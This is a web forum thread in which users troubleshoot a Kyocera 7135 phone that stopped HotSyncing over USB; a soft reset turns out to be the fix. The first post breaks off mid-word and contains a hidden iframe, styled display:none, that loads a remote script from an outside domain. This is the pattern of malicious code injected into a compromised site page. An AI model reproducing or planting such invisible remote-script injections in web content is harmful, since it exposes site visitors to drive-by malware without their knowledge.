+ Reply to Thread
Page 1 of 3 1 2 3 LastLast
Results 1 to 20 of 59
  1. #1
    Registered User
    Join Date
    12-21-2002
    Posts
    18

    7135 HotSync Problem - It worked now it won't

    I got my 7135 up and working with Verizon without any problem. I deleted the backup folder and hotsynced the phone OK using the USB connection. I hotsynced it several times over several days. I left town for a few days, came home and dropped it back in the cradle and it won't work. Of course Kyocera's tech support is out for the holidays. I've checked my connections, resinstalled the Palm software an<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User
    Join Date
    01-19-2002
    Posts
    332
    If you haven't already, try rebotting with the USB cradle plugged in. I am having a weird thing happen after my computer comes back from standby. I searched the Palm knowledge and there is a known issue where the USB port gets "confused" after a standby and they suggest a reboot of the computer. Hope it helps.

  3. #3
    Registered User
    Join Date
    12-21-2002
    Posts
    18
    Thanks for the reply, but, that doesn't do it. I've rebooted the computer serveral times. I unpluged and repluged the USB connection. I've power down the telephone. I've said ZZQWOIKBKJKLADLK several times, but, nothing seems to work.

  4. #4
    Registered User
    Join Date
    10-03-2002
    Posts
    147
    Originally posted by bg1811
    Thanks for the reply, but, that doesn't do it. I've rebooted the computer serveral times. I unpluged and repluged the USB connection. I've power down the telephone. I've said ZZQWOIKBKJKLADLK several times, but, nothing seems to work.
    That was the phrase that was used under the old 3.5 OS. You need to upgrade the pass code ... try "verizonsucksassfornotgettingitoutcanyouhearmenow"

    If that doesn't work.
    1. Go to the "System" Control Panel.
    2. Select the "Hardware Tab".
    3. Click on the "Device Manager" button.
    4. Click on th "+" next to the "Universal Serial Bus controller" item.
    5. Highlight ANY item in there that look remotely phone like, or suspect.
    5.5. Hit the "Del" key.
    6. Close everything down.
    7. Unplug your USB connector.
    8. POwer everything back up, log into Windows.
    9. Plug in the USB plug for your cradle. Nothing will probably happen.
    10. Place the phone in the cradle. Windows should go "Oh ****, there is a USB device plugged in, let me find all the drivers needed and install it for you."
    11. Follow prompts.
    12. Should now be installed.

    Next part, make sure Hotsync is setup correctly.

    In the bottom righ hand corner of the screen in the system tray should be the "circling arrows" icon. Right click on that, and make sure that "Local USB" is checked. "Local Serial" can optionally be on or off - not important.

    Run a Hotsync, and see if that works.

  5. #5
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048
    what errors are you getting if any? when you press the button, do you hear the startup sounds?

  6. #6
    Registered User
    Join Date
    01-19-2002
    Posts
    332
    Sorry, I thought you had probably tried it. When you say it doesn't work, what exactly happens when you hit the hotsync button? Have you tried instigating hotsync from the hotsync app in the palm?

  7. #7
    Registered User
    Join Date
    12-21-2002
    Posts
    18
    The message I'm getting is:
    HotSync Problem
    The connection between your handheld computer and the desktop could not be established. Please check your setup and try again.

    When I unplug the USB connection and replug it I get the following message:
    USB DEVICE NOT RECOGNIZED
    One of the USB devices attached to this computer has malfunticioned, and Windows does not recognize it.

  8. #8
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048
    sounds like you need to reinstall the usb drivers for it.

  9. #9
    PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar
    Join Date
    09-29-2003
    Location
    ST. ALBANS, WV
    Posts
    891

    hot sync fix

    you need to check your hotsync setting on the desktop.

    right click on the hotsync icon and make sure you have usb sync enabled.

    If that still doesnt work, on the phone click hotsync and make sure you ahve local highlighted. and cradle/cable in the drop down menu picked.
    GREG HARKINS
    GREGHARKINS@BRINGINGFUNTOYOU.COM
    www.bringingfuntoyou.com

  10. #10
    Registered User
    Join Date
    09-09-2002
    Posts
    463
    Just throwing this out. Try connecting via serial. I was out of USB ports at the office where I have it hooked up and didn't want to buy a hub. Connected to serial and haven't had any problems. Might be a temporary work around if the problem is USB related.
    If you don't have any data that is critical in your Palm folder I'd blow it away and uninstall Palm Desktop to eliminate any traces of your old system.
    just my .02

    pdageek

  11. #11
    Registered User
    Join Date
    12-21-2002
    Posts
    18
    It does work using the serial port, so it has to do with the USB connection. I, by mistake ordered a hotsync cradle for the phone, not realizing that one was included with it. I tried the other cradle and got the same error message. I have unstalled the desktop and reinstalled it. Same error messages!

  12. #12
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048
    go to your device manager and highlight the usb connections. see if you have a yellow "?" mark on it. you may not have fully instaled the drivers for the usb...

  13. #13
    Registered User
    Join Date
    10-03-2002
    Posts
    147
    Originally posted by bg1811
    It does work using the serial port, so it has to do with the USB connection. I, by mistake ordered a hotsync cradle for the phone, not realizing that one was included with it. I tried the other cradle and got the same error message. I have unstalled the desktop and reinstalled it. Same error messages!
    Uninstalling the desktop does nothing for the USB drivers. See my message above ... it talks you through removing the USB drivers.

  14. #14
    PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar
    Join Date
    09-29-2003
    Location
    ST. ALBANS, WV
    Posts
    891

    usb removeal

    What windows system are you using?

    With WIndows xp he could just remove all the usb devices and let them all reassign themselves. That might help if there are any other conflicts with other devices.
    GREG HARKINS
    GREGHARKINS@BRINGINGFUNTOYOU.COM
    www.bringingfuntoyou.com

  15. #15
    Registered User
    Join Date
    08-13-2002
    Posts
    8
    Token User (above) told you how to fix this. I've had to do this a few times. For some reason the USB port doesn't stay recognized by the computer.

  16. #16
    Registered User
    Join Date
    10-19-2003
    Posts
    117
    I think you left a step out after 5 though.
    What do you do after you highlight and before you shutdown?

  17. #17
    Registered User
    Join Date
    10-03-2002
    Posts
    147
    Originally posted by Primate
    I think you left a step out after 5 though.
    What do you do after you highlight and before you shutdown?
    I think you must be mistaken. Have a look at step 5.5.

  18. #18
    Registered User
    Join Date
    12-21-2002
    Posts
    18
    PROBLEM FIXED. I got CS from Kyocera on the phone. This guy knew the right answers to all my problems. Anyway, the sync problem was solved by pushing the soft reset button on the phone. I can't believe I spent two days futzing with this thing. I also had a question about the time setting on the phone. I'm in the Central Time Zone. I had to leave my phone set to Pacific Time in order for the correct time to appear. Problem solved...change the time setting to Central and power down the phone, power up the phone and....problem fixed. He also solved my problem with not being able to get on the web with the phone. I'm really impressed with my first contact with Kyocera's CS. Thanks to everyone who attempted to help me with the sync problem. Now all of us will know what to do when that problem crops up.

  19. #19
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048
    you guys are starting to see a lot of bugs poping up... you guys should post your firmware version numbers and compare notes...

  20. #20
    Registered User Beryl's Avatar
    Join Date
    09-11-2002
    Location
    Colorado
    Posts
    1,912
    Originally posted by bg1811
    PROBLEM FIXED. I got CS from Kyocera on the phone. This guy knew the right answers to all my problems. Anyway, the sync problem was solved by pushing the soft reset button on the phone.
    This happened to me tonight.

    I can't believe I spent 20 minutes doing this:
    1. starting/stopping the Hotsync,
    2. rebooting my laptop
    3. warm resetting the Palm
    4. syncing (**whew**)
    5. searching to find this thread only to find that BG had discovered the same solution.

    This should be in a FAQ because the solution is very simple and I'm certain others will run into this problem again.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts